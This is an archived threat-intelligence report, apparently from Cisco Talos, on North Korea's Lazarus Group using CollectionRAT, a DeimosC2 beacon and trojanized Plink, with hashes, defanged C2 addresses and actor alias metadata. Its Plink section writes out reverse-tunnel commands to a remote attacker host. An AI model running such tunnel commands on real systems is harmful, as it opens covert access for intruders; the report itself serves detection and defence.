{ "id": "7a512182-8404-4c50-9d5e-6c691fc61648", "created_at": "2026-04-06T00:07:09.895639Z", "updated_at": "2026-04-10T03:38:19.252163Z", "deleted_at": null, "sha1_hash": "af49b1c03b279bab539136a05c4955863e535b47", "title": "Lazarus Group's infrastructure reuse leads to discovery of new malware", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1564159, "plain_text": "Lazarus Group's infrastructure reuse leads to discovery of new\r\nmalware\r\nBy Asheer Malhotra\r\nPublished: 2023-08-24 · Archived: 2026-04-05 14:04:13 UTC\r\nThursday, August 24, 2023 08:04\r\nIn the Lazarus Group’s latest campaign, which we detailed in a recent blog, the North Korean state-sponsored actor is exploiting CVE-2022-47966, a ManageEngine ServiceDesk vulnerability to deploy\r\nmultiple threats. In addition to their “QuiteRAT” malware, which we covered in the blog, we also\r\ndiscovered Lazarus Group using a new threat called “CollectionRAT.”\r\nCollectionRAT has standard remote access trojan (RAT) capabilities, including the ability to run arbitrary\r\ncommands on an infected system. Based on our analysis, CollectionRAT appears to be connected to\r\nJupiter/EarlyRAT, another malware family Kaspersky recently wrote about and attributed to Andariel, a\r\nsubgroup within the Lazarus Group umbrella of threat actors.\r\nLazarus Group appears to be changing its tactics, increasingly relying on open-source tools and\r\nframeworks in the initial access phase of their attacks, as opposed to strictly employing them in the post-compromise phase.\r\nOne such example of this trend is Lazarus Group’s use of the open-source DeimosC2 framework. The\r\nDeimosC2 agent we discovered in this campaign is an ELF binary, indicating Lazarus’ intention to deploy\r\nthis implant during initial access against compromised Linux endpoints.\r\nLazarus Group reuses infrastructure in continuous assault on enterprises\r\nIn the new Lazarus Group campaign we recently disclosed, the North Korean state-sponsored actor continues to\r\nuse much of the same infrastructure despite those components being well-documented by security researchers over\r\nhttps://blog.talosintelligence.com/lazarus-collectionrat/\r\nPage 1 of 10\n\nthe years. Their continued use of the same tactics, techniques and procedures (TTPs) — many of which are\r\npublicly known — highlights the group’s confidence in their operations and presents opportunities for security\r\nresearchers. By tracking and analyzing these reused infrastructure components, we identified the new\r\nCollectionRAT malware detailed in this report.\r\nAs mentioned, Lazarus Group remains highly active, with this being their third documented campaign in less than\r\na year. In September 2022, Talos published details of a Lazarus Group campaign targeting energy providers in the\r\nUnited States, Canada and Japan. This campaign, enabled by the successful exploitation of the Log4j\r\nvulnerability, heavily employed a previously unknown implant we called “MagicRAT,” along with known\r\nmalware families VSingle, YamaBot and TigerRAT, all of which were previously attributed to the threat actor by\r\nJapanese and Korean government agencies.\r\nSome of the TTPs used in another Lazarus Group campaign in late 2022 have been highlighted by WithSecure.\r\nThis report illustrated Lazarus Group exploiting unpatched Zimbra devices and deploying a remote access trojan\r\n(RAT) similar to MagicRAT. This is the same RAT Talos observed being deployed after Lazarus Group’s\r\nexploitation of ManageEngine ServiceDesk, which we detailed in an earlier blog, -known as “QuiteRAT.”\r\nQuiteRAT and MagicRAT are both based on the Qt framework and have similar capabilities, but QuiteRAT is\r\nlikely an attempt to compact MagicRAT into a smaller and easier to deploy malicious implant based on its size.\r\nIn addition to this recent campaign illustrating how active Lazarus Group remains, this activity also serves as\r\nanother example of the actor reusing the same infrastructure. We discovered that QuiteRAT and the open-source\r\nDeimosC2 agents used in this campaign were hosted on the same remote locations used by the Lazarus Group in\r\ntheir preceding campaign from 2022 that deployed MagicRAT. This infrastructure was also used for commanding\r\nand controlling CollectionRAT, the newest malware in the actor’s arsenal. A malicious copy of PuTTY’s Plink\r\nutility (a reverse-tunneling tool) was also hosted on the same infrastructure serving CollectionRAT to\r\nhttps://blog.talosintelligence.com/lazarus-collectionrat/\r\nPage 2 of 10\n\ncompromised endpoints. Lazarus has been known to use dual-use utilities in their operations, especially for\r\nreverse tunneling such as Plink and 3proxy.\r\nSome CollectionRAT malware from 2021 was signed with the same code-signing certificate as Jupiter/EarlyRAT\r\n(also from 2021), a malware family listed in CISA’s advisory detailing recent North Korean ransomware activity.\r\nThe connections between the various malware are depicted below:\r\nLazarus evolves malicious arsenal with CollectionRAT and DeimosC2\r\nCollectionRAT consists of a variety of standard RAT capabilities, including the ability to run arbitrary commands\r\nand manage files on the infected endpoint. The implant consists of a packed Microsoft Foundation Class (MFC)\r\nlibrary-based Windows binary that decrypts and executes the actual malware code on the fly. Malware developers\r\nlike using MFC even though it’s a complex, object-oriented wrapper. MFC, which traditionally is used to create\r\nWindows applications’ user interfaces, controls and events, allows multiple components of malware to seamlessly\r\nwork with each other while abstracting the inner implementations of the Windows OS from the authors. Using\r\nsuch a complex framework in malware makes human analysis more cumbersome. However, in CollectionRAT, the\r\nMFC framework has just been used as a wrapper/decrypter for the actual malicious code.\r\nCollectionRAT initially gathers system information to fingerprint the infection and relay it to the C2 server. It then\r\nreceives commands from the C2 server to perform a variety of tasks on the infected system. The implant has the\r\nability to create a reverse shell, allowing it to run arbitrary commands on the system. The implant can read and\r\nwrite files from the disk and spawn new processes, allowing it to download and deploy additional payloads. The\r\nimplant can also remove itself from the endpoint when directed by the C2.\r\nhttps://blog.talosintelligence.com/lazarus-collectionrat/\r\nPage 3 of 10\n\nImplant's configuration strings.\r\nThe preliminary system information is sent to the C2 server to register the infection, which subsequently issues\r\ncommands to the implant.\r\nInitial check-in over HTTP to C2 server.\r\nhttps://blog.talosintelligence.com/lazarus-collectionrat/\r\nPage 4 of 10\n\nCollectionRAT and its link to EarlyRAT\r\nAnalyzing CollectionRAT indicators of compromise (IOCs) enabled us to discover links to EarlyRAT, a\r\nPureBasic-based implant that security research firm Kaspersky recently attributed to the Andariel subgroup. We\r\ndiscovered a CollectionRAT sample signed with the same certificate used to sign an older version of EarlyRAT\r\nfrom 2021. Both sets of samples used the same certificate from “OSPREY VIDEO INC.” with the same serial\r\nnumber and thumbprint. The EarlyRAT malware was also listed in CISA’s advisory from February 2023\r\nhighlighting ransomware activity conducted by North Korea against healthcare and critical infrastructure entities\r\nacross the world. Kaspersky reported that EarlyRAT is deployed via the successful exploitation of the Log4j\r\nvulnerability. EarlyRAT is also known as the “Jupiter” malware. DCSO CyTec’s blog contains more details about\r\nJupiter.\r\nCommon OSPREY VIDEO INC certificate from 2021 used to sign CollectionRAT and EarlyRAT\r\nLazarus Group appears to be shifting its tactics, increasingly relying on open-source tools and frameworks in the\r\ninitial access phase of their attacks as opposed to strictly employing them in the post-compromise phase. Lazarus\r\nGroup previously relied on the use of custom-built implants such as MagicRAT, VSingle, DTrack, and Yamabot as\r\na means of establishing persistent initial access on a successfully compromised system. These implants are then\r\ninstrumented to deploy a variety of open-source or dual-use tools to perform a multitude of malicious hands-on-https://blog.talosintelligence.com/lazarus-collectionrat/\r\nPage 5 of 10\n\nkeyboard activities in the compromised enterprise network. These include proxy tools,, credential-dumping tools\r\nsuch as Mimikatz and post-compromise reconnaissance and pivoting frameworks such as Impacket. However,\r\nthese tools have primarily been used in the post-compromise phase of the attack. This campaign is one such\r\ninstance where the attackers used the DeimosC2 open-source C2 framework as a means of initial and persistent\r\naccess. DeimosC2 is a GoLang-based C2 framework supporting a variety of RAT capabilities similar to other\r\npopular C2 frameworks such as Cobalt Strike and Sliver.\r\nDeimosC2 analysis\r\nApart from the many dual-use tools and post-exploitation frameworks found on Lazarus Group’s hosting\r\ninfrastructure, we discovered the presence of a new implant that we identified as a beacon from the open-source\r\nDeimosC2 framework. Contrary to most of the malware found on their hosting infrastructure, the DeimosC2\r\nimplant was a Linux ELF binary, indicating the intention of the group to deploy it during the initial access on\r\nLinux-based servers.\r\nThe implant itself is an unmodified copy of the regular beacon that the DeimosC2’s C2 server produces when\r\nconfigured with the required parameters. It contains the standard URI paths that remain the same as the\r\nconfiguration provided in an out-of-the-box configuration of the implant. The lack of heavy customization of the\r\nimplant indicates that the operators of DeimosC2 in this campaign may still be in the process of getting used to\r\nand adopting the framework to their needs.\r\nConfiguration in the DeimosC2 implant.\r\nhttps://blog.talosintelligence.com/lazarus-collectionrat/\r\nPage 6 of 10\n\nTrend Micro has an excelelnt analysis of the DeimosC2, but the implants typically have various RAT capabilities\r\nsuch as:\r\nExecute arbitrary commands on the endpoint.\r\nCredential stealing and registry dumping.\r\nDownload and upload files from C2.\r\nShellcode execution.\r\nUninstallation of the implant.\r\nMalicious Plink\r\nAnother open-source tool we observed Lazarus Group using is the reverse tunneling tool PuTTY Link (Plink). In\r\nthe past, we’ve observed Lazarus Group use Plink to establish remote tunnel using commands such as:\r\npvhost.exe -N -R 18118:127.0.0.1:8118 -P [Port] -l [username] -pw [password] \u003cRemote_IP\u003e\r\nThe option -R forwards port 8118 on 127.0.0.1 to the remote server on port 18118.\r\nHowever, we found that Lazarus Group has now started generating malicious Plink binaries out of PuTTY’s\r\nsource code to embed the reverse tunnel command strings in the binary itself. The following figure shows a\r\ncomparison of:\r\nThe malicious Plink binary on the left contains the reverse tunnel command with the switches in the\r\nformat:\r\nPlink.exe -N -R 4443:127.0.0.1:80 -P 443 -l [username]-pw [password] \u003cRemote_IP\u003e\r\nA benign Plink binary on the right was used in 2022 by Lazarus as part of their hands-on-keyboard activity.\r\nhttps://blog.talosintelligence.com/lazarus-collectionrat/\r\nPage 7 of 10\n\nA malicious copy of Plink (left) compared to a benign version (right), both used by Lazarus.\r\nThe malicious Plink will also create a mutex named “Global\\WindowsSvchost” before establishing the remote\r\ntunnel to ensure that only one connection is made between the local machine and C2.\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in\r\nthese attacks.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. You can try Secure Email for free here.\r\nhttps://blog.talosintelligence.com/lazarus-collectionrat/\r\nPage 8 of 10\n\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products.\r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and\r\nURLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites\r\nand tests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your\r\nnetwork.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org. Snort SIDs for this threat: 62248, 62253-62255.\r\nIOCs\r\nIOCs for this research can also be found in our GitHub repository here.\r\nHashes\r\nQuiteRAT\r\ned8ec7a8dd089019cfd29143f008fa0951c56a35d73b2e1b274315152d0c0ee6\r\nCollectionRAT\r\ndb6a9934570fa98a93a979e7e0e218e0c9710e5a787b18c6948f2eedd9338984\r\n773760fd71d52457ba53a314f15dddb1a74e8b2f5a90e5e150dea48a21aa76df\r\nDeimosC2\r\n05e9fe8e9e693cb073ba82096c291145c953ca3a3f8b3974f9c66d15c1a3a11d\r\nTrojanized Plink\r\ne3027062e602c5d1812c039739e2f93fc78341a67b77692567a4690935123abe\r\nNetworks IOCs\r\nhttps://blog.talosintelligence.com/lazarus-collectionrat/\r\nPage 9 of 10\n\n146[.]4[.]21[.]94\r\n109[.]248[.]150[.]13\r\n108[.]61[.]186[.]55:443\r\nhxxp[://]146[.]4[.]21[.]94/tmp/tmp/comp[.]dat\r\nhxxp[://]146[.]4[.]21[.]94/tmp/tmp/log[.]php\r\nhxxp[://]146[.]4[.]21[.]94/tmp/tmp/logs[.]php\r\nhxxp[://]ec2-15-207-207-64[.]ap-south-1[.]compute[.]amazonaws[.]com/resource/main/rawmail[.]php\r\nhxxp[://]109[.]248[.]150[.]13/EsaFin[.]exe\r\nhxxp[://]146[.]4[.]21[.]94/boards/boardindex[.]php\r\nhxxp[://]146[.]4[.]21[.]94/editor/common/cmod\r\nSource: https://blog.talosintelligence.com/lazarus-collectionrat/\r\nhttps://blog.talosintelligence.com/lazarus-collectionrat/\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://blog.talosintelligence.com/lazarus-collectionrat/" ], "report_names": [ "lazarus-collectionrat" ], "threat_actors": [ { "id": "838f6ced-12a4-4893-991a-36d231d96efd", "created_at": "2022-10-25T15:50:23.347455Z", "updated_at": "2026-04-10T02:00:05.295717Z", "deleted_at": null, "main_name": "Andariel", "aliases": [ "Andariel", "Silent Chollima", "PLUTONIUM", "Onyx Sleet" ], "source_name": "MITRE:Andariel", "tools": [ "Rifdoor", "gh0st RAT" ], "source_id": "MITRE", "reports": null }, { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "110e7160-a8cc-4a66-8550-f19f7d418117", "created_at": "2023-01-06T13:46:38.427592Z", "updated_at": "2026-04-10T02:00:02.969896Z", "deleted_at": null, "main_name": "Silent Chollima", "aliases": [ "Onyx Sleet", "PLUTONIUM", "OperationTroy", "Guardian of Peace", "GOP", "WHOis Team", "Andariel", "Subgroup: Andariel" ], "source_name": "MISPGALAXY:Silent Chollima", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bc6e3644-3249-44f3-a277-354b7966dd1b", "created_at": "2022-10-25T16:07:23.760559Z", "updated_at": "2026-04-10T02:00:04.741239Z", "deleted_at": null, "main_name": "Andariel", "aliases": [ "APT 45", "Andariel", "G0138", "Jumpy Pisces", "Onyx Sleet", "Operation BLACKMINE", "Operation BLACKSHEEP/Phase 3.", "Operation Blacksmith", "Operation DESERTWOLF/Phase 3", "Operation GHOSTRAT", "Operation GoldenAxe", "Operation INITROY/Phase 1", "Operation INITROY/Phase 2", "Operation Mayday", "Operation VANXATM", "Operation XEDA", "Plutonium", "Silent Chollima", "Stonefly" ], "source_name": "ETDA:Andariel", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "771d9263-076e-4b6e-bd58-92b6555eb739", "created_at": "2025-08-07T02:03:25.092436Z", "updated_at": "2026-04-10T02:00:03.758541Z", "deleted_at": null, "main_name": "NICKEL HYATT", "aliases": [ "APT45 ", "Andariel", "Dark Seoul", "Jumpy Pisces ", "Onyx Sleet ", "RIFLE Campaign", "Silent Chollima ", "Stonefly ", "UN614 " ], "source_name": "Secureworks:NICKEL HYATT", "tools": [ "ActiveX 0-day", "DTrack", "HazyLoad", "HotCriossant", "Rifle", "UnitBot", "Valefor" ], "source_id": "Secureworks", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434029, "ts_updated_at": 1775792299, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/af49b1c03b279bab539136a05c4955863e535b47.pdf", "text": "https://archive.orkl.eu/af49b1c03b279bab539136a05c4955863e535b47.txt", "img": "https://archive.orkl.eu/af49b1c03b279bab539136a05c4955863e535b47.jpg" } }